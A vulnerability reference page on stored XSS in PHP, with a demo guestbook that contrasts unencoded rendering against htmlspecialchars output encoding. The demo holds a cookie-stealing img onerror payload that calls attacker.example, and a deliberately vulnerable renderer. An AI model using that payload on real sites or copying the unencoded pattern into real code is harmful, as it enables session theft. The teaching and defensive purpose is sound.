PHP

PHP : Persistent XSS

Classification

Overview

A stored (persistent) cross-site scripting (XSS) attack is possible: attacker-controlled input is saved by the application and later rendered into a page without output encoding, so every user who views that page executes the attacker's script.

Cross-site scripting is one of the most common attacks on web applications. It holds seventh place (A7:2017) in the OWASP Top 10 2017 ranking of the most significant web application risks.

The core of any XSS attack is the execution of malicious code in the context of the vulnerable application, unnoticed by the victim. The attack relies on a feature of the client application (the browser): scripts embedded in a page's markup are executed automatically. In most cases the malicious script is JavaScript.

The consequences of XSS range from broken application functionality to a complete loss of confidentiality of the user's data. Script injected by an XSS attack can read the user's HTTP cookies (unless they are marked HttpOnly) and send them to the attacker, who can then make requests to the server on the user's behalf; even without cookie theft, the script can perform actions in the application as the logged-in user.

OWASP classifies XSS attacks as follows:

  • Server XSS occurs when untrusted data is included in the HTML response generated by the server. The data may come directly from the request (reflected XSS) or from server-side storage such as a database, where the attacker placed it earlier through a normal application feature (stored XSS).
  • Client XSS occurs when untrusted data is used to update the DOM of a page with an unsafe JavaScript call (for example, assigning to innerHTML). The data may come from the DOM itself (such as location.hash) or from the server (for example, the body of an AJAX response).

Typical server-type attack scenario:

  1. Unchecked data, usually from an HTTP request, reaches the server side of the application and, in the stored case, is written to a database or file.
  2. The server dynamically generates a web page that contains the unvalidated data.
  3. While generating the page, the server does not prevent the inclusion of content that the client (browser) will execute: JavaScript code, HTML tags, HTML attributes such as event handlers, or legacy plug-in content (Flash, ActiveX).
  4. The victim's browser renders the page, which now carries the embedded malicious code because data from an untrusted source was used.
  5. Since the malicious code arrives in a page served by the trusted server, the browser executes it with the privileges of the application: it can read the application's cookies and DOM and send requests to the application's origin.
  6. The same-origin policy, which is supposed to keep code from one origin away from the resources of another, offers no protection here: from the browser's point of view the attacker's script is part of the application's own origin.
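The scenario above, as an added PHP example that is not part of the DerScanner page: a minimal guestbook stores a comment (step 1) and later builds the page from the stored text (steps 2 and 3), first without and then with output encoding. The attacker payload, the author names, and the guestbook schema are constructed for the example; it assumes PHP 8 with the PDO SQLite driver and uses an in-memory database so it runs offline.

```php
<?php
// Added example (not from DerScanner): stored XSS in a PHP guestbook, and its fix.
// Assumes PHP 8 with PDO + SQLite; the in-memory database stands in for the real one.
declare(strict_types=1);

// Constructed attacker input: an image tag whose event handler exfiltrates cookies.
const MALICIOUS_COMMENT = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

function openDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');
    return $db;
}

// Step 1: unchecked request data is persisted. The prepared statement prevents SQL
// injection, but says nothing about what the stored text will do in a browser later.
function storeComment(PDO $db, string $author, string $body): void
{
    $stmt = $db->prepare('INSERT INTO comments (author, body) VALUES (:author, :body)');
    $stmt->execute([':author' => $author, ':body' => $body]);
}

// Steps 2-3 (vulnerable): stored data is concatenated straight into the HTML.
function renderVulnerable(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT author, body FROM comments') as $row) {
        $html .= "<p><b>{$row['author']}</b>: {$row['body']}</p>\n";
    }
    return $html;
}

// Output encoder for the HTML body and quoted-attribute contexts. ENT_QUOTES encodes
// both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Steps 2-3 (fixed): every untrusted value is encoded for the context it lands in.
function renderSafe(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT author, body FROM comments') as $row) {
        $html .= '<p><b>' . e($row['author']) . '</b>: ' . e($row['body']) . "</p>\n";
    }
    return $html;
}

// Reviewer check: the rendered page must not contain the payload in executable form.
// After encoding, '<img' becomes '&lt;img' and onerror="..." becomes onerror=&quot;...
function containsRawPayload(string $html): bool
{
    return str_contains($html, '<img src=x') || str_contains($html, 'onerror="');
}

$db = openDb();
storeComment($db, 'alice', 'Nice article!');
storeComment($db, 'mallory', MALICIOUS_COMMENT);   // the "stored" half of the attack

echo "--- vulnerable rendering ---\n", renderVulnerable($db);
echo "--- encoded rendering ---\n", renderSafe($db);
echo 'vulnerable rendering carries payload: ', var_export(containsRawPayload(renderVulnerable($db)), true), "\n";
echo 'encoded rendering carries payload:    ', var_export(containsRawPayload(renderSafe($db)), true), "\n";
```

Two caveats a practitioner should keep in mind. First, htmlspecialchars is correct only for the HTML body and quoted attribute contexts; data placed inside a script block, a URL, or a CSS value needs the encoder for that context (for example json_encode with JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS for JavaScript string literals). Second, encoding at input time is the wrong place for the fix: the same stored value may be rendered into several contexts, and data that entered the database through another path (an import, an API, a second application) was never encoded at all. Encode at output, and add a Content-Security-Policy and HttpOnly cookie flags as defence in depth.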

Client-type attacks proceed in a similar way; the only difference is that the malicious code is injected while the client-side code works with the document object model received from the server, rather than while the server generates the page.

DerScanner Severity Score: MEDIUM


See also

  • PHP : Null salt
  • PHP : Empty password
  • PHP : Empty salt